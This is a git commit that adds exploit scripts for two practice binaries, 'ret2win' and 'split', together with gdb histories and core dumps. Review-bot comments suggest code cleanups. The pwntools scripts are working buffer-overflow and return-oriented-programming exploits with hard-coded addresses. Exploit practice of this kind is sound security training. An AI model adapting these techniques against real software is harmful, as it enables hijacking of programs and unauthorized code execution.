author | Brett Weiland <brett_weiland@bpcspace.com> | 2020-12-14 18:27:06 -0600 |
committer | Brett Weiland <brett_weiland@bpcspace.com> | 2020-12-14 18:27:06 -0600 |
commit | ae586f332c3fa2919fca99b0ff8acf1e339b0061 (patch) | |
tree | 1a91dbbf26977db4492d9f752231c5bc3a358506 /x86_64 | |
parent | c9f44615e78db425febfdc3b601b90d2a3df7456 (diff) |
new file: x86_64/ret2win/.gdb_history
new file: x86_64/ret2win/core
new file: x86_64/ret2win/exploit.py
new file: x86_64/split/.gdb_history
new file: x86_64/split/core
new file: x86_64/split/core.split.25050
new file: x86_64/split/exploit.py
new file: x86_64/split/fuckyou
new file: x86_64/split/xaa
Diffstat (limited to 'x86_64')
-rw-r--r-- | x86_64/ret2win/.gdb_history | 6 | ||||
-rw-r--r-- | x86_64/ret2win/core | bin | 0 -> 2183168 bytes | |||
-rwxr-xr-x | x86_64/ret2win/exploit.py | 13 | ||||
-rw-r--r-- | x86_64/split/.gdb_history | 256 | ||||
-rw-r--r-- | x86_64/split/core | bin | 0 -> 2183168 bytes | |||
-rw-r--r-- | x86_64/split/core.split.25050 | bin | 0 -> 7067872 bytes | |||
-rwxr-xr-x | x86_64/split/exploit.py | 17 | ||||
-rw-r--r-- | x86_64/split/fuckyou | bin | 0 -> 64 bytes | |||
-rw-r--r-- | x86_64/split/xaa | bin | 0 -> 50 bytes |
9 files changed, 292 insertions, 0 deletions
diff --git a/x86_64/ret2win/.gdb_history b/x86_64/ret2win/.gdb_history new file mode 100644
index 0000000..54449f7
--- /dev/null
+++ b/x86_64/ret2win/.gdb_history
@@ -0,0 +1,6 @@
+starti
+context
+nexti
+break main
+continue
+q
diff --git a/x86_64/ret2win/core b/x86_64/ret2win/core Binary files differnew file mode 100644
index 0000000..4a61a20
--- /dev/null
+++ b/x86_64/ret2win/core
diff --git a/x86_64/ret2win/exploit.py b/x86_64/ret2win/exploit.py new file mode 100755
index 0000000..d5506b2
--- /dev/null
+++ b/x86_64/ret2win/exploit.py
@@ -0,0 +1,13 @@
+#!/usr/bin/env python3
+from pwn import *
+
+prog = process('./ret2win')
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload += p64(0x0000000000400756)
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
diff --git a/x86_64/split/.gdb_history b/x86_64/split/.gdb_history new file mode 100644
index 0000000..7bd75aa
--- /dev/null
+++ b/x86_64/split/.gdb_history 
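Review bot: The padding loop `for c in range(40): payload += b'a'` in ret2win/exploit.py rebuilds the bytes object forty times with an unused loop variable; `payload = b'a' * 40` says the same thing in one line. The hard-coded `p64(0x0000000000400756)` carries no comment, unlike the addresses in split/exploit.py in this same commit, so a reader cannot tell what it points at without reopening the binary; a trailing comment naming the symbol it resolves to would fix that. `payload += b"\n"` followed by `prog.sendline(payload)` sends two newlines, because sendline appends its own; drop the explicit one. Finally, `sleep(1)` followed by `prog.recv()` is timing dependent — `recv()` returns whatever happens to be buffered at that moment and raises EOFError if the child has already exited — so `print(prog.recvall().decode())` is the more reliable way to collect the output.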
@@ -0,0 +1,256 @@
+print (char)usefulString
+print (char&)usefulString
+print (char*)usefulString
+print (char)*usefulString
+print (charusefulString
+print (char)usefulString
+print (char*)usefulString
+print (char)*usefulString
+quit
+exit
+quit
+nexti
+exit
+quit
+exit
+quit
+quit
+exit
+quit
+context
+next
+continue
+context
+quit
+nexti
+continu
+context
+q
+context
+run
+break main
+continue
+context
+nexti
+backtrace
+set exception-debugger on
+continue
+quit
+stepi
+ret
+return
+stepi
+break
+delete
+run
+continue
+clear
+delete
+continue
+clear
+delete
+continue
+delete 0x7f992453fece
+delete 0
+delete 1
+delete 2
+delete 3
+quit
+continue
+context
+q
+context
+q
+quit
+continue
+context
+continue
+q
+q
+break main
+continue
+context
+nexti
+stepi
+quit
+break main
+run
+conitnue
+continue
+context
+stepi
+nexti
+stepi
+return
+stepi
+return
+stepi
+ret
+return
+stepi
+return
+stepi
+stepi
+info breakpoints
+stepi
+return
+stepi
+nexti
+break 0x400706
+break *0x400706
+quit
+continue
+context
+q
+continue
+context
+continue
+quit
+continue
+continue
+quit
+continue
+context
+quit
+continue
+quit
+exit
+quit
+nexti
+continue
+quit
+continue
+quit
+break pwnme
+nexti
+continue
+bexti
+nexti
+quit
+quit
+continue
+quit
+continue
+nexti
+quit
+continue
+q
+continue
+quit
+continue
+[
+quit
+start < fuckyou
+continue
+q
+break *0x0x000000000040074b
+break *0x000000000040074b
+run < fuckyou
+context
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 20
+x/s 0x7fffffffdb2
+quit
+break *0x000000000040074b
+run < fuckyou
+context
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 8
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 8
+x/s 0x7fffffffdb20 + 8
+quit
+quit
+run < fuckyou
+quit
+break *0x000000000040074b
+run < fuckyou
+context
+stepi
+q
+break *0x000000000040074b
+run < fuckyou
+context
+q
+break *0x000000000040074b
+run < fuckyou
+context
+x 0x7fffffffdb20-8
+x 0x7ffff7fad800
+q
+break pwnme
+run < fuckyou
+nexti
+q
+break pwnme
+run
+q
+break pwnme
+run < fuckyou
+context 
+nexti
+q
+break pwnme
+run < fuckyou
+nexti
+x/100c 0x7ffff7fad800
+context
+nexti
+quit
+break *0x00000000004007c3
+run < fuckyou
+context
+nexti
+stepi
+q
+break pwnme
+start < fuckyou
+context
+stepi
+return
+context
+break pwnme
+continue
+q
+break pwnme
+run < fuckyou
+context
+nexti
+stepi
+q
+continue
+quit
+continue
+[A
+quit
+q
+info break
+nexti
+break main
+continue
+nexti
+return
+nexti
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+q
+continue
+nexti
+q
+continue
+nexti
+continue
+quit
diff --git a/x86_64/split/core b/x86_64/split/core Binary files differnew file mode 100644
index 0000000..cf4e312
--- /dev/null
+++ b/x86_64/split/core
diff --git a/x86_64/split/core.split.25050 b/x86_64/split/core.split.25050 Binary files differnew file mode 100644
index 0000000..6acafe1
--- /dev/null
+++ b/x86_64/split/core.split.25050
diff --git a/x86_64/split/exploit.py b/x86_64/split/exploit.py new file mode 100755
index 0000000..0340b77
--- /dev/null
+++ b/x86_64/split/exploit.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+from pwn import *
+
+
+context.binary = "./split"
+prog = process('./split')
+payload = b''
+
+for c in range(40): #originally 40
+ payload += b'a'
+
+payload += p64(0x00000000004007c3)
+payload += p64(0x0000000000601060) # usefulString
+payload += p64(0x000000000040074b) # usefulFunction + offset
+
+prog.sendline(payload)
+prog.interactive()
diff --git a/x86_64/split/fuckyou b/x86_64/split/fuckyou Binary files differnew file mode 100644
index 0000000..d25275b
--- /dev/null
+++ b/x86_64/split/fuckyou
diff --git a/x86_64/split/xaa b/x86_64/split/xaa Binary files differnew file mode 100644
index 0000000..f1294fd
--- /dev/null
+++ b/x86_64/split/xaa |
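Review bot: The comment `#originally 40` on `for c in range(40):` in split/exploit.py explains nothing, since the value is still 40; either record what else was tried and why it was wrong, or delete it, and the loop itself collapses to `payload = b'a' * 40`. The first chain entry `p64(0x00000000004007c3)` is the only one of the three addresses without a label, while the next two carry `# usefulString` and `# usefulFunction + offset`; give it the same treatment so the three literals are self-describing. Separately, this commit checks in `x86_64/split/core`, `x86_64/split/core.split.25050` (about 7 MB per the diffstat), `x86_64/ret2win/core` and both `.gdb_history` files; core dumps are snapshots of process memory and environment and, like gdb history, are scratch artifacts that belong in `.gitignore` rather than in the repository.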